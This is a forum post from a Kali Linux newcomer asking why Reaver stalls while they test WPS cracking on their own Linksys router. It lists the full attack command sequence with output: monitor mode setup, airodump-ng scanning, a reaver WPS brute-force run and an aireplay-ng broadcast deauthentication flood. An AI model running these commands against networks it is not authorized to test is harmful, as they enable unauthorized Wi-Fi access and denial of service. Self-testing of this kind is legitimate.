I downloaded the latest Kali Linux last week and I am booting from a live DVD. My laptop is an HP Elitebook 850 with an Intel Wireless 7260 AC. I am new to Kali Linux but I've been doing a lot of research, reading documentation, looking thru forums, Youtube videos, etc. I am trying to see if I can hack my home wireless AP using Reaver, it's a Linksys EA2700 and it does have WPS turned on. I am about 10 ft away from it so range is not a problem. I was able to get pretty far on my own and I got Reaver started but it's stuck at switching channels, I even left it running overnight. Also, I am not running this from VM or anything, booting from my laptop to the Live DVD. After booting, here's what I type:
Code:
root@kali:~# iwconfig
eth0 no wireless extensions.
wlan0 IEEE 802.11abgn ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=0 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on
Then I stop the Network Manager and kill all the processes that can cause trouble.
Code:
root@kali:~# service network-manager stop
root@kali:~# airmon-ng check kill
Killing these processes:
PID Name
1328 wpa_supplicant
Now I put the interface in Monitor Mode
Code:
root@kali:~# airmon-ng start wlan0
No interfering processes found
PHY Interface Driver Chipset
phy0 wlan0 iwlwifi Intel Corporation Wireless 7260 (rev 73)
(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
(mac80211 station mode vif disabled for [phy0]wlan0)
Now I set the interface on channel 1 because my AP is on channel 1. I know this step seems a bit backwards because I haven't run Airodump yet to scan for the SSIDs but having gone thru these steps numerous times, I already know my AP is on channel 1. I did read in some of the forums that some people had better luck with setting the channel prior to turning on "monitor mode" but this is the only way I could get it to work.
Code:
root@kali:~# iwconfig wlan0mon channel 1
Now I run Airodump-ng to scan for the wireless networks around me.
Code:
root@kali:~# airodump-ng wlan0mon
CH 2 ][ Elapsed: 18 s ][ 2015-08-29 21:03
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
20:AA:4B:92:AF:4B -48 24 28 0 1 54e WPA2 CCMP PSK SepiaFlamingo
02:AA:4B:92:AF:4C -49 23 0 0 1 54e OPN SepiaFlamingo-guest
BSSID STATION PWR Rate Lost Frames Probe
20:AA:4B:92:AF:4B 60:02:B4:D1:C7:8E -29 0 - 0e 8 3
20:AA:4B:92:AF:4B 00:21:6A:A7:C2:9E -36 0e- 1e 1812 29
Press CTRL-C to exit out of Airodump. Optionally, I also ran the command: WASH (to show the wireless APs that has WPS enabled but I didn't need this because it's my home AP so I know it has WPS enabled)
Then I ran Reaver and this is the part where it gets stuck. It just keeps cycling thru the channels.
Code:
root@kali:~# reaver -i wlan0mon -b 20:AA:4B:92:AF:4B -S -N -a -w -vv
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212
[+] Waiting for beacon from 20:AA:4B:92:AF:4B
[+] Switching wlan0mon to channel 1
[+] Switching wlan0mon to channel 2
[+] Switching wlan0mon to channel 1
I read somewhere if you have trouble associating to try to use Aireplay. I had two terminal windows open, one with Airodump and the other one with Aireplay. Here's my output from that but Reaver still wouldn't work, even after using Aireplay.
Code:
root@kali:~# aireplay-ng -0 0 -a 20:AA:4B:92:AF:4B wlan0mon
21:31:12 Waiting for beacon frame (BSSID: 20:AA:4B:92:AF:4B) on channel 1
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
21:31:12 Sending DeAuth to broadcast -- BSSID: [20:AA:4B:92:AF:4B]
21:31:12 Sending DeAuth to broadcast -- BSSID: [20:AA:4B:92:AF:4B]
Anybody have any ideas how to fix this?